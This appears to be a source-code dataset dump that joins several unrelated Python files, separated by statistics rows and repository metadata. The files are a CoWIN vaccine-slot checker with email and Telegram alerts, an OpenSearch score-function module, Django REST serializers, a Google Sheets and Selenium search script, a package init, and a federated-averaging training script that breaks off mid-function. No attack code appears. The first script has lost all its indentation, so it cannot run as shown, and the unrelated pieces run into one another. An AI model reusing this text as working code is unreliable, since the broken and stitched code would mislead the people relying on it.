# Global vars
DEBUG = False
SENT_MAIL_QUEUE = set()
SENT_TELEGRAM_QUEUE = set()
PORT = 587
######### Util functions #########
def debug(data, name):
if DEBUG:
print(f"Data: {data}\nFunction name: {name}\n\n")
def error(err, err_type='normal'):
if err_type == 'critical':
print(f"Error: {err}")
input('Press any key to exit...')
sys.exit()
else:
print(f"Error: {err}")
######### Util functions end #########
######### User input parsing functions #########
def parse():
global SMTP_SERVER, PORT, SENDER_EMAIL, SENDER_PASS
parser = argparse.ArgumentParser(prog='vaccinator')
parser.add_argument('-p', '--pincode', metavar='Pincode1 Pincode2', type=int, nargs='*', required=False, \
help='Pincode(s) to look for slots.')
parser.add_argument('-a', '--age', metavar='Age', type=int, required=False, default=18, \
help='Age of the user(Default=18).')
parser.add_argument('-d', '--date', metavar='Date', type=str, required=False, default=date.today().strftime('%d-%m-%Y'), \
help='Date from which to start looking(Format=DD-MM-YYYY).')
parser.add_argument('-w', '--wizard', metavar='Wizard', type=bool, nargs='?', required=False, const=True, default=False, \
help='For using user friendly interface')
parser.add_argument('-e', '--email', metavar='Email', type=str, required=False, \
help='Email on which to notify when slots are available')
parser.add_argument('-i', '--interval', metavar='Interval', type=int, required=False, default=300, \
help='Interval in seconds after which to recheck the slots(Default=300).')
parser.add_argument('-s', '--state', metavar='State', type=str, required=False, \
help='Interval in seconds after which to recheck the slots(Default=300).')
parser.add_argument('-t', '--district', metavar='District', type=str, required=False, \
help='Interval in seconds after which to recheck the slots(Default=300).')
parser.add_argument('--port', metavar='Port', type=int, required=False, default=PORT, \
help=f'Port of the SMTP server(Default={PORT})')
parser.add_argument('--smtp-server', metavar='Smtp Server', type=str, required=False, \
help=f'SMTP Server address to use for sending email.')
parser.add_argument('--sender-email', metavar='Sender email', type=str, required=False, \
help=f'Email of the sender to connect to SMTP server for sending email.')
parser.add_argument('--sender-pass', metavar='Sender pass', type=str, required=False, \
help=f'Password of the sender to connect to SMTP server for sending email.')
parser.add_argument('--bot-token', metavar='Telegram bot token', type=str, required=False, \
help=f'Token of the telegram bot to send messsages.')
parser.add_argument('--bot-chatid', metavar='Telegram bot chatid', type=str, required=False, \
help=f'Chat ID of the telegram bot to send messages.')
args = vars(parser.parse_args())
if not args['state'] and not args['pincode'] and not args['wizard']:
error('Neither --pincode, nor --state with --district entered. So calling wizard...')
args['wizard'] = True
elif not re.search(r"\d{2}\-\d{2}\-\d{4}", args['date']):
error(f"Date {args['date']} is not in DD-MM-YYYY format", 'critical')
return args
def wizard():
global SMTP_SERVER, PORT, SENDER_EMAIL, SENDER_PASS
output = {'pincode': [], 'age': 18, 'date': date.today().strftime('%d-%m-%Y'), 'email': '', 'state': '', 'district': '', 'interval': 300, \
'smtp_server': '', 'port': PORT, 'sender_email': '', 'sender_pass': '', 'bot_token': '', 'bot_chatid': ''}
print('\nEnter the answer to following questions as asked. If you don\'t know any, skip it by pressing Enter, the default value will be used.\
\nAlso, make sure to enter the email if you wish to be informed when slot is open!\n')
output['pincode'] = str(input('Enter single or multiple picodes separated by space i.e. 1234 1235 1236 (Skip if wish to search by state and district):')).split(' ') or output['pincode']
output['state'] = str(input('Enter state (skip if using pincode):')) or output['state']
output['district'] = str(input('Enter district (skip if using pincode):')) or output['district']
output['age'] = str(input('Enter user age i.e. 23 (Default=18):')) or output['age']
output['date'] = str(input(f"Enter date in DD-MM-YYYY format i.e. 01-02-2021. It is advised to use default date so press Enter(Default={output['date']}):")) or output['date']
output['email'] = str(input('Enter email address to send message when slots found:')) or output['email']
output['interval'] = str(input('Enter interval in which to scan cowin website in seconds (Default=300):')) or output['interval']
output['smtp_server'] = str(input(f'Enter the address of SMTP Server to use for sending emails:')) or output['smtp_server']
output['port'] = str(input(f'Enter the port of SMTP server(Default={PORT}):')) or output['port']
output['sender_email'] = str(input(f'Enter the email to connect to the SMTP Server for sending emails:')) or output['sender_email']
output['sender_pass'] = str(input(f'Enter the password to connect to the SMTP Server for sending emails:')) or output['sender_pass']
output['bot_token'] = str(input(f'Enter the Telegram bot token to send messages:')) or output['bot_token']
output['bot_chatid'] = str(input(f'Enter the Telegram bot chat ID to send messages')) or output['bot_chatid']
if not re.search(r"\d{2}\-\d{2}\-\d{4}", output['date']):
error(f"Date {output['date']} is not in DD-MM-YYYY format", 'critical')
return output
######### User input parsing functions end #########
######## Class starts #############
class vaccinator:
def __init__(self, args):
self.pincode = args['pincode']
self.age = int(args['age'])
self.date = args['date']
self.state = args['state']
self.district = args['district']
def detect(self, data):
output = {self.pincode: []}
if 'error' in data.keys():
error(data['error'])
return output
if data == {'centers': []} or data == {'sessions': []}:
return output
for center in data['centers']:
for session in center['sessions']:
if session['min_age_limit'] <= self.age and session['available_capacity'] > 0:
output[self.pincode].append([f"{center['name']}, {center['block_name']}, {center['district_name']}, {center['state_name']}, {center['pincode']}",\
session['date'], session['slots']])
debug(output, 'detect')
return output
def search_by_state(self):
hdrs={'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"}
did = state_id = 0
res = district_data = ''
states = { 'andaman and nicobar islands': 1, 'andhra pradesh': 2, 'arunachal pradesh': 3, 'assam': 4, 'bihar': 5, 'chandigarh': 6, 'chhattisgarh': 7, 'dadra and nagar haveli': 8, 'daman and diu': 37, 'delhi': 9, 'goa': 10, 'gujarat': 11, 'haryana': 12, 'himachal pradesh': 13, 'jammu and kashmir': 14, 'jharkhand': 15, 'karnataka': 16, 'kerala': 17, 'ladakh': 18, 'lakshadweep': 19, 'madhya pradesh': 20, 'maharashtra': 21, 'manipur': 22, 'meghalaya': 23, 'mizoram': 24, 'nagaland': 25, 'odisha': 26, 'puducherry': 27, 'punjab': 28, 'rajasthan': 29, 'sikkim': 30, 'tamil nadu': 31, 'telangana': 32, 'tripura': 33, 'uttar pradesh': 34, 'uttarakhand': 35, 'west bengal': 36 }
try:
state_id = states[self.state.lower()]
except KeyError:
error('State invalid')
return ''
fetch_districts_url = f"https://cdn-api.co-vin.in/api/v2/admin/location/districts/{state_id}"
try:
res = r.get(fetch_districts_url, headers=hdrs)
except Exception as e:
error(f"Error while fetching district list\n{e}")
return ''
district_data = res.json()
for district in district_data['districts']:
if district['district_name'].lower() == self.district.lower():
did = district['district_id']
if did == 0:
error('District not found!!')
return ''
statewise_url = f"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict?district_id={did}&date={self.date}"
try:
res = r.get(statewise_url, headers=hdrs)
except Exception as e:
error(f"Error while fetching statewise data\n{e}")
return ''
if res.status_code != 200:
error('Response code not ok')
return ''
try:
debug(json.dumps(res.json(), indent = 1), 'search_by_state')
except Exception as e:
error('JSON decode error')
else:
return self.detect(res.json())
return ''
def search_by_pin(self):
hdrs={'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"}
url = f"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode={self.pincode}&date={self.date}"
try:
res = r.get(url, headers=hdrs)
except Exception as e:
error(e)
else:
if res.status_code != 200:
error('Response code not ok')
return ''
try:
debug(json.dumps(res.json(), indent = 1), 'search_by_pin')
except Exception as e:
error('JSON decoder error')
else:
return self.detect(res.json())
return ''
######## Class ends #############
######## Alert functions ########
def desktop_notification(data):
notification.notify(
title = 'vaccinator Slots Found!',
message = data,
timeout = 10
)
def send_email(args, data):
global SENT_MAIL_QUEUE
if not args['email']:
error('No email found to send slot info')
return ''
if not args['smtp_server'] or not args['sender_email'] or not args['sender_pass']:
error('Email options not set properly, cannot send mail')
return ''
if data in SENT_MAIL_QUEUE:
error('Email already sent so skipping it')
return ''
else:
SENT_MAIL_QUEUE.add(data)
message = f"""\
Subject: Some slots have opened up which are as follows:
{data}
******This message was sent by vaccinator script*****"""
smtp_server = args['smtp_server']
port = int(args['port'])
sender_email = args['sender_email']
password = args['sender_pass']
email = args['email']
context = ssl.create_default_context()
try:
server = smtplib.SMTP(smtp_server,port)
server.starttls(context=context) # Secure the connection
server.login(sender_email, password)
server.sendmail(sender_email, email, message)
print('Info: Email sent')
server.quit()
except Exception as e:
error(f"{e}\nUnable to send email.")
server.quit()
def telegram_bot_sendtext(args, message):
global SENT_TELEGRAM_QUEUE
if not args['bot_token'] or not args['bot_chatid']:
error('Telegram bot options not set properly, cannot send telegram message')
return ''
if message in SENT_TELEGRAM_QUEUE:
error('This Telegram message is already sent so skipping it')
return ''
else:
SENT_TELEGRAM_QUEUE.add(message)
send_text = f"https://api.telegram.org/bot{args['bot_token']}/sendMessage?chat_id={args['bot_chatid']}&parse_mode=Markdown&text={message}"
try:
res = r.get(send_text)
except Exception as e:
error(f"Error while sending telegram message {e}")
else:
return res.json()
######## Alert functions end ########
def repeater(args):
location_type = ''
data = {}
messages = ''
run = vaccinator(args)
if args['state']:
location_type = f"State: {args['state']}, District: {args['district']}"
data = run.search_by_state()
if args['pincode']:
location_type = f"Pincode: {args['pincode']}"
data = run.search_by_pin()
if data == {args['pincode']:[]} or not data:
print(f"No slots found for {location_type}")
return ''
sequence = 1
for i in data[args['pincode']]:
messages += f"\n{sequence}. Date: {i[1]}\n Location: {i[0]}\n Slots: {i[2]}"
sequence += 1
messages = f"***Available at {location_type}***{messages}"
return messages
def main():
# Parsing and settting options
all_args = wizard() if parse()['wizard'] else parse()
debug(all_args, 'main')
counter = 1
pins = all_args['pincode']
# Infinite loop
while True:
print(f"\n[Time: {datetime.now().strftime('%H:%M:%S')}] Try: [{counter}]")
found = ''
if pins:
for pin in pins :
all_args['pincode'] = pin # To send single pin instead of list
found += repeater(all_args)
else:
found += repeater(all_args)
if found: # Script will keep beeping while waiting if slots are found
############ All alerts #################
print(found)
telegram_bot_sendtext(all_args, found)
if all_args['email']:
send_email(all_args, found)
print('Info: Slots have been found. Exit the program to stop the beeping sound')
desktop_notification(f"Slots available at State: {all_args['state']} or Pincode: {all_args['pincode']}. Check terminal for detailed info.")
for _ in range(1,int(all_args['interval'])):
sys.stdout.write('\a')
sys.stdout.flush()
time.sleep(1)
############ All alerts end ################
else:
print(f"Info: Going to sleep for {int(all_args['interval'])/60} minutes till next try.")
time.sleep(int(all_args['interval']))
counter += 1
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print('\nUser Aborted\nExiting, please wait...')
sys.exit()
| 44.612813 | 682 | 0.56225 | 1,924 | 16,016 | 4.537942 | 0.220894 | 0.021762 | 0.027259 | 0.020616 | 0.265949 | 0.241439 | 0.185889 | 0.169396 | 0.134692 | 0.134692 | 0 | 0.017021 | 0.277348 | 16,016 | 358 | 683 | 44.73743 | 0.737342 | 0.024288 | 0 | 0.214765 | 0 | 0.043624 | 0.41748 | 0.021053 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043624 | false | 0.030201 | 0.036913 | 0 | 0.161074 | 0.040268 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8db7b0a0b74ffa065a705147027e75e8d0ea2e | 3,857 | py | Python | opensearch_dsl/function.py | CEHENKLE/opensearch-dsl-py | f004b394f8c81be59a30b4d6841ab69ccbf9c006 | [
"Apache-2.0"
] | 13 | 2021-10-16T13:11:57.000Z | 2022-02-11T19:13:05.000Z | opensearch_dsl/function.py | CEHENKLE/opensearch-dsl-py | f004b394f8c81be59a30b4d6841ab69ccbf9c006 | [
"Apache-2.0"
] | 9 | 2021-10-15T18:40:15.000Z | 2022-03-23T21:56:29.000Z | opensearch_dsl/function.py | CEHENKLE/opensearch-dsl-py | f004b394f8c81be59a30b4d6841ab69ccbf9c006 | [
"Apache-2.0"
] | 8 | 2021-10-30T13:21:29.000Z | 2022-03-29T20:14:40.000Z | # SPDX-License-Identifier: Apache-2.0
#
# The OpenSearch Contributors require contributions made to
# this file be licensed under the Apache-2.0 license or a
# compatible open source license.
#
# Modifications Copyright OpenSearch Contributors. See
# GitHub history for details.
#
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
try:
import collections.abc as collections_abc # only works on python 3.3+
except ImportError:
import collections as collections_abc
from .utils import DslBase
def SF(name_or_sf, **params):
# {"script_score": {"script": "_score"}, "filter": {}}
if isinstance(name_or_sf, collections_abc.Mapping):
if params:
raise ValueError("SF() cannot accept parameters when passing in a dict.")
kwargs = {}
sf = name_or_sf.copy()
for k in ScoreFunction._param_defs:
if k in name_or_sf:
kwargs[k] = sf.pop(k)
# not sf, so just filter+weight, which used to be boost factor
if not sf:
name = "boost_factor"
# {'FUNCTION': {...}}
elif len(sf) == 1:
name, params = sf.popitem()
else:
raise ValueError("SF() got an unexpected fields in the dictionary: %r" % sf)
# boost factor special case, see https://github.com/elastic/elasticsearch/issues/6343
if not isinstance(params, collections_abc.Mapping):
params = {"value": params}
# mix known params (from _param_defs) and from inside the function
kwargs.update(params)
return ScoreFunction.get_dsl_class(name)(**kwargs)
# ScriptScore(script="_score", filter=Q())
if isinstance(name_or_sf, ScoreFunction):
if params:
raise ValueError(
"SF() cannot accept parameters when passing in a ScoreFunction object."
)
return name_or_sf
# "script_score", script="_score", filter=Q()
return ScoreFunction.get_dsl_class(name_or_sf)(**params)
class ScoreFunction(DslBase):
_type_name = "score_function"
_type_shortcut = staticmethod(SF)
_param_defs = {
"query": {"type": "query"},
"filter": {"type": "query"},
"weight": {},
}
name = None
def to_dict(self):
d = super(ScoreFunction, self).to_dict()
# filter and query dicts should be at the same level as us
for k in self._param_defs:
if k in d[self.name]:
d[k] = d[self.name].pop(k)
return d
class ScriptScore(ScoreFunction):
name = "script_score"
class BoostFactor(ScoreFunction):
name = "boost_factor"
def to_dict(self):
d = super(BoostFactor, self).to_dict()
if "value" in d[self.name]:
d[self.name] = d[self.name].pop("value")
else:
del d[self.name]
return d
class RandomScore(ScoreFunction):
name = "random_score"
class FieldValueFactor(ScoreFunction):
name = "field_value_factor"
class Linear(ScoreFunction):
name = "linear"
class Gauss(ScoreFunction):
name = "gauss"
class Exp(ScoreFunction):
name = "exp"
| 30.132813 | 93 | 0.651802 | 499 | 3,857 | 4.937876 | 0.366733 | 0.017045 | 0.022727 | 0.012175 | 0.158685 | 0.10349 | 0.049513 | 0.049513 | 0.049513 | 0.049513 | 0 | 0.005183 | 0.249676 | 3,857 | 127 | 94 | 30.370079 | 0.846234 | 0.380607 | 0 | 0.149254 | 0 | 0 | 0.134664 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0.029851 | 0.059701 | 0 | 0.462687 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8e5f0147dcdda64ded2911f084d79a4acf77e0 | 3,438 | py | Python | apps/purchases/api/serializers.py | mikespux/prov-jewellery-cloud | 4bb16b74d4f32eec938e64325c39bb5770ad2848 | [
"MIT"
] | 1 | 2020-05-17T22:27:02.000Z | 2020-05-17T22:27:02.000Z | apps/purchases/api/serializers.py | antorenge/prov-jewellery-cloud | de09048c7043d970d62d13dba1beac73c42ef281 | [
"MIT"
] | 7 | 2020-06-05T18:13:25.000Z | 2022-03-11T23:20:21.000Z | apps/purchases/api/serializers.py | mikespux/prov-jewellery-cloud | 4bb16b74d4f32eec938e64325c39bb5770ad2848 | [
"MIT"
] | null | null | null | """
Purchases API
"""
from rest_framework import serializers
from apps.users.api.serializers import UserSerializer
from apps.inventory.api.serializers import InventoryItemSerializer
from apps.products.api.serializers import (MaterialSerializer,
ProductDesignSerializer)
from ..models import (ArtisanProduction, Supplier, Location, PurchaseOrder,
PurchaseOrderProduct, PurchaseOrderDelivery,
Workshop)
class WorkshopSerializer(serializers.ModelSerializer):
"""Serializer for workshops"""
artisans = UserSerializer(many=True, read_only=True)
class Meta:
model = Workshop
fields = ('name', 'address', 'artisans')
class MiniPurchaseOrderSerializer(serializers.ModelSerializer):
"""Mini serializer for purchase orders"""
workshop = WorkshopSerializer()
class Meta:
model = PurchaseOrder
fields = ('code', 'name', 'workshop', 'date_created', 'due_date')
class PurchaseOrderProductSerializer(serializers.ModelSerializer):
"""Serializer for purchase order products"""
order = MiniPurchaseOrderSerializer()
product = ProductDesignSerializer()
class Meta:
model = PurchaseOrderProduct
fields = ('order', 'product', 'quantity_ordered', 'unit_price')
class PurchaseOrderDeliverySerializer(serializers.ModelSerializer):
"""Serializer for deliveries"""
po_product = PurchaseOrderProductSerializer()
delivered_by = UserSerializer()
received_by = UserSerializer()
items = InventoryItemSerializer(many=True)
class Meta:
model = PurchaseOrderDelivery
fields = ('id', 'po_product', 'items', 'quantity_delivered',
'quantity_received', 'date_delivered', 'date_received',
'delivered_by', 'received_by')
class PurchaseOrderSerializer(serializers.ModelSerializer):
"""Serializer for purchase orders"""
workshop = WorkshopSerializer()
products = PurchaseOrderProductSerializer(
source='purchaseorderproduct_set', many=True)
class Meta:
model = PurchaseOrder
fields = ('code', 'name', 'workshop', 'products', 'date_created',
'due_date')
class LocationSerializer(serializers.ModelSerializer):
"""Serializer for locations"""
class Meta:
model = Location
fields = ('name', 'longitude', 'latitude')
class SupplierSerializer(serializers.ModelSerializer):
"""Serializer for suppliers"""
material = MaterialSerializer()
location = LocationSerializer()
class Meta:
model = Supplier
fields = ('material', 'name', 'address', 'location')
class ArtisanProductionSerializer(serializers.ModelSerializer):
"""Serializer for artisan productions"""
po_product = PurchaseOrderProductSerializer()
suppliers = SupplierSerializer(source='supplier_set', many=True)
location = LocationSerializer()
created_by = UserSerializer()
modified_by = UserSerializer()
class Meta:
model = ArtisanProduction
fields = ('po_product', 'quantity_produced', 'date_created',
'date_modified', 'created_by', 'modified_by', 'location',
'suppliers')
class ValidateSerializer(serializers.Serializer):
"""Validate JSON web tokens serializer"""
id = serializers.CharField(max_length=200)
signed = serializers.CharField()
| 30.696429 | 75 | 0.684991 | 277 | 3,438 | 8.393502 | 0.314079 | 0.089462 | 0.048172 | 0.117419 | 0.151828 | 0.087742 | 0.042151 | 0.042151 | 0 | 0 | 0 | 0.001109 | 0.213205 | 3,438 | 111 | 76 | 30.972973 | 0.85841 | 0.084642 | 0 | 0.242424 | 0 | 0 | 0.133484 | 0.007757 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.075758 | 0 | 0.621212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b914dd6bd0c32e0b0e0f9fee38aac8091c15b3b | 3,063 | py | Python | src/fill_in_forms.py | vicksonzero/webbot | 8cdbe655bafae90d390c0f051c799e164d63365e | [
"MIT"
] | null | null | null | src/fill_in_forms.py | vicksonzero/webbot | 8cdbe655bafae90d390c0f051c799e164d63365e | [
"MIT"
] | null | null | null | src/fill_in_forms.py | vicksonzero/webbot | 8cdbe655bafae90d390c0f051c799e164d63365e | [
"MIT"
] | null | null | null | # Google sheets
from __future__ import print_function
import httplib2
import os
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
except ImportError:
flags = None
# selenium
import time
from selenium import webdriver
import requests
# Dickson
# import os
from keys import google_sheet_presets, selenium_presets
import random
SCOPES = 'https://www.googleapis.com/auth/spreadsheets.readonly'
CLIENT_SECRET_FILE = "keys/client_secret_oauth.json"
APPLICATION_NAME = 'Google Sheets API Python Quickstart'
def get_credentials():
"""
Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(
credential_dir,
'google-sheet-fill-in-forms-py.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, flags)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
print('Storing credentials to ' + credential_path)
return credentials
def getSpreadsheetValues(spreadsheetId, rangeName):
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
discoveryUrl = 'https://sheets.googleapis.com/$discovery/rest?version=v4'
service = discovery.build(
'sheets',
'v4',
http = http,
discoveryServiceUrl = discoveryUrl)
# COLUMNS
result = (service.spreadsheets().values().get(
spreadsheetId = spreadsheetId,
range = rangeName,
majorDimension = "COLUMNS"
)
.execute())
result.get('values', [])
return result
def main():
"""
reads names from google sheet,
uses selenium to open a chrome google.com
input 5 random names from the sheet and search
"""
values = getSpreadsheetValues(google_sheet_presets.SHEET_ID, "C4:C29")
print("sheet result:")
print(values)
chromedriver = selenium_presets.CHROME_DRIVER
#os.environ["webdriver.chrome.driver"] = chromedriver
driver = webdriver.Chrome(chromedriver)
for i in range(5):
randomName = random.choice (values["values"][0]);
print(randomName);
driver.get('http://www.google.com/xhtml');
time.sleep(1) # Let the user actually see something!
search_box = driver.find_element_by_id('gs_lc0')
search_box = search_box.find_element_by_css_selector(".gsfi")
search_box.send_keys("sc2 " + randomName)
search_box.submit()
time.sleep(3) # Let the user actually see something!
time.sleep(3)
driver.quit()
if __name__ == '__main__':
main()
| 27.106195 | 75 | 0.757754 | 395 | 3,063 | 5.726582 | 0.412658 | 0.019894 | 0.01061 | 0.020336 | 0.026525 | 0.026525 | 0 | 0 | 0 | 0 | 0 | 0.00834 | 0.138753 | 3,063 | 112 | 76 | 27.348214 | 0.849128 | 0.186092 | 0 | 0.026316 | 0 | 0 | 0.137414 | 0.025537 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039474 | false | 0 | 0.184211 | 0 | 0.25 | 0.065789 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b95d709623e6f9a1a48dbe716470993b1042f83 | 323 | py | Python | pythx/__init__.py | s0b0lev/pythx | c34d81421a2cbea71e60c33245d54fb19b6ad68a | [
"MIT"
] | null | null | null | pythx/__init__.py | s0b0lev/pythx | c34d81421a2cbea71e60c33245d54fb19b6ad68a | [
"MIT"
] | null | null | null | pythx/__init__.py | s0b0lev/pythx | c34d81421a2cbea71e60c33245d54fb19b6ad68a | [
"MIT"
] | null | null | null | """Top-level package for pythx."""
__author__ = """Dominik Muhs"""
__email__ = "dominik.muhs@consensys.net"
__version__ = "1.3.2"
from pythx.conf import config
from pythx.api.client import Client
from mythx_models.exceptions import (
MythXBaseException,
MythXAPIError,
ValidationError,
ValidationError,
)
| 21.533333 | 40 | 0.736842 | 37 | 323 | 6.081081 | 0.72973 | 0.097778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010949 | 0.151703 | 323 | 14 | 41 | 23.071429 | 0.810219 | 0.086687 | 0 | 0.181818 | 0 | 0 | 0.148789 | 0.089965 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.272727 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b96fe8753e574fd0587ec62d1080f3007e66924 | 6,882 | py | Python | src/main.py | karavik18/Verification-and-Selection-in-Federated-Average | b7a275b6158c9e9d9c16c1e62786558037196306 | [
"MIT"
] | null | null | null | src/main.py | karavik18/Verification-and-Selection-in-Federated-Average | b7a275b6158c9e9d9c16c1e62786558037196306 | [
"MIT"
] | null | null | null | src/main.py | karavik18/Verification-and-Selection-in-Federated-Average | b7a275b6158c9e9d9c16c1e62786558037196306 | [
"MIT"
] | null | null | null | import os
import time
import copy
import random
import argparse
import numpy as np
from PIL import Image
from tqdm import tqdm as tq
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils import data
from model_utils import *
from data_utils import *
from train import train
from inference import calc_acc
from model_selection_utils import model_selection
def avg_weights(w, args):
running_mean_sqr, running_sqr_mean = [], []
wts = torch.ones(len(w)).to(args.device)
w_avg = copy.deepcopy(w[0])
for key in w_avg.keys():
w_avg[key] = w_avg[key].to(args.device)
layer = key.split('.')[-1]
if layer == 'running_mean':
for i in range(len(w)):
running_mean_sqr.append(torch.square(w[i][key].to(args.device)))
if i != 0:
w_avg[key] += torch.mul(w[i][key].to(args.device),wts[i].to(float))
key_prev = key
w_avg[key] = torch.true_divide(w_avg[key].to(args.device), sum(wts))
elif layer =='running_var':
for i in range(len(w)):
running_sqr_mean.append(torch.mul(torch.add(w[i][key].to(args.device),running_mean_sqr[i]),wts[i].to(float)))
running_sqr_mean_avg = torch.true_divide(sum(running_sqr_mean), sum(wts))
w_avg[key] = torch.sub(running_sqr_mean_avg, torch.square(w_avg[key_prev].to(args.device)))
running_mean_sqr, running_sqr_mean = [], []
elif layer == 'num_batches_tracked':
batches = 0
for i in range(1,len(w)):
w_avg[key] += w[i][key].to(args.device)
w_avg[key] = torch.true_divide(w_avg[key].to(args.device), len(w)).to(torch.int64)
else:
for i in range(1,len(w)):
w_avg[key] += torch.mul(w[i][key].to(args.device), wts[i].to(float))
w_avg[key] = torch.true_divide(w_avg[key].to(args.device), sum(wts))
return w_avg
def server_coordination(args):
Model = get_model(args)
global_model = Model.state_dict()
if args.dataset == 'mnist':
testloader = data.DataLoader(mnistLoader(split='test'), batch_size=args.batch_size, shuffle=False, pin_memory=False)
else:
testloader = None
test_acc = []
for round_ in range(args.round):
print("\nRound {} is started.\n".format(round_+1))
received_models = []
selected_users = np.random.choice(np.arange(args.num_users), size=max(int(args.num_users*args.frac), 1), replace=False)
for user in selected_users:
local_model = train(global_model, user, round_+1, args)
received_models.append(local_model)
selected_models = model_selection(received_models, global_model, args)
global_model = avg_weights(selected_models, args)
Model.load_state_dict(global_model)
test_acc.append(calc_acc(testloader, Model, args))
print("\t Accuracy of the 'Global Model' on test dataset: {:.2f}%".format(test_acc[-1]))
torch.save(global_model, args.modelpath+'model_niid-degree_'+str(args.niid_degree)+'.pt')
torch.save(test_acc, args.resultpath+'test_acc_'+str(args.niid_degree)+'.pt')
# test accuracy plot
plt.figure()
plt.plot(range(1,len(test_acc)+1), test_acc, '-b')
plt.xlabel('Communication rounds')
plt.ylabel('Accuracy')
plt.title('Percentage Accuracy, evaluated on Test set')
plt.xlim(1,len(test_acc))
plt.ylim(0, 100)
plt.savefig(args.resultpath+'test_acc_'+str(args.niid_degree)+'.pdf')
def args_parser():
parser = argparse.ArgumentParser()
# federated arguments (Notation for the arguments followed from paper)
parser.add_argument('--algo', choices=['FedAvg', 'FedProx'], type=str, default='FedAvg', help="Name of algorithm. Allowable values: FedAvg and FedProx")
parser.add_argument('--loc_epoch', '-le', type=int, default=10, help="Number of local epochs: E")
parser.add_argument('--frac', '-c', type=float, default=0.1, help='the fraction of clients: C')
parser.add_argument('--drop_percent', '-dp', type=float, default=0.4, help='percentage of slow devices')
parser.add_argument('--mu', type=float, default=0, help="The proximal loss for the FedProx algo")
parser.add_argument('--batch_size', '-b', type=int, default=10, help="Local batch size: B")
parser.add_argument('--aug', type=int, default=0, help="1 inplies augmentation enabled")
parser.add_argument('--lr', type=float, default=1e-3, help="Learning rate for generator networks")
parser.add_argument('--round', '-r', type=int, default=10, help="number of communication round")
# other arguments
parser.add_argument('--dataset', type=str, default='mnist', help="name of dataset")
parser.add_argument('--model', choices=['MLP', 'CNN'], type=str, default='MLP', help='model name')
parser.add_argument('--hidden_nodes', '-hn', default=100, type=int, help='Number of hidden nodes in MLP')
parser.add_argument('--gpu', default=0, type=int, help='GPU number')
parser.add_argument('--optimizer', type=str, default='sgd', help="type of optimizer")
parser.add_argument('--niid_degree', '-nd', type=int, default=0, help='Default set to IID. Set integers from 1 to 4 for incresing degree of non-IID.')
parser.add_argument('--verbose', type=int, default=1, help='verbose')
parser.add_argument('--seed', type=int, default=1, help='random seed')
parser.add_argument('--run', type=str, default=-999, help="Run number")
args = parser.parse_args()
args.device = torch.device("cuda:"+str(args.gpu) if torch.cuda.is_available() else "cpu")
# directory to save results
args.root = os.path.dirname(os.path.abspath('./.'))
savepath = args.root+'/save/'
